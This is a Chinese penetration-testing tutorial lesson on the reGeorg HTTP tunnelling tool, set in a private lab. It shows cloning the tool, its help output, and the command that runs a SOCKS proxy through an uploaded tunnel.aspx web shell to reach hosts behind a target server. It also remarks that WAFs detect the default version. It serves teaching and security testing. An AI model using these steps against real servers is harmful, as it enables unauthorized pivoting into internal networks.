第九十八课:HTTP隧道reGeorg第二季
reGeorg 的前身是2008年 SensePost 在 BlackHat USA 2008 的 reDuh 延伸与扩展。也是目前安全从业人员使用最多,范围最广,支持多丰富的一款 http 隧道。从本质上讲,可以将 JSP/PHP/ASP/ASPX 等页面上传到目标服务器,便可以访问该服务器后面的主机。
攻击机:
192.168.1.5 Debian
192.168.1.4 Windows 7
靶机:
192.168.1.119 Windows 2003
安装:
1
[email protected]:~# git clone https://github.com/sensepost/reGeorg.git
2
Cloning into 'reGeorg'...
3
remote: Enumerating objects: 85, done.
4
remote: Total 85 (delta 0), reused 0 (delta 0), pack‐reused 85
5
Unpacking objects: 100% (85/85), done.
6
[email protected]:~# cd reGeorg/
7
[email protected]:~reGeorg# ls
8
LICENSE.html LICENSE.txt README.md reGeorgSocksProxy.py tunnel.ashx tu
9
nnel.aspx tunnel.js tunnel.jsp tunnel.nosocket.php tunnel.php tunnel.tomcat.5.jsp
10
[email protected]:~/reGeorg# python reGeorgSocksProxy.py ‐h
11
12
13
_____
14
_____ ______ __|___ |__ ______ _____ _____ ______
15
| | | ___|| ___| || ___|/ \| | | ___|
16
| \ | ___|| | | || ___|| || \ | | |
17
|__|\__\|______||______| __||______|\_____/|__|\__\|______|
18
|_____|
19
... every office needs a tool like Georg
20
21
[email protected] / @_w_m__
22
[email protected] / @trowalts
23
[email protected] / @kamp_staaldraad
24
25
usage: reGeorgSocksProxy.py [‐h] [‐l] [‐p] [‐r] ‐u [‐v]
26
27
Socks server for reGeorg HTTP(s) tunneller
28
29
optional arguments:
30
‐h, ‐‐help show this help message and exit
31
‐l , ‐‐listen‐on The default listening address
32
‐p , ‐‐listen‐port The default listening port
33
‐r , ‐‐read‐buff Local read buffer, max data to be sent per POST
34
‐u , ‐‐url The url containing the tunnel script
35
‐v , ‐‐verbose Verbose output[INFO\|DEBUG]
Copied!
1
[email protected]:~/reGeorg# pip install urllib3
2
Requirement already satisfied: urllib3 in /usr/lib/python2.7/dist‐packages (1.24)
Copied!
靶机执行:
以aspx为demo。
攻击机执行:
1
python reGeorgSocksProxy.py ‐p 8080 ‐l 192.168.1.5 ‐u http://192.168.1.119/tunnel.aspx
Copied!
Windows下配合Proxifier:
非常遗憾的是,目前大部分waf都会针对默认原装版本的reGeorg。
Micropoor
Last modified 3yr ago
Copy link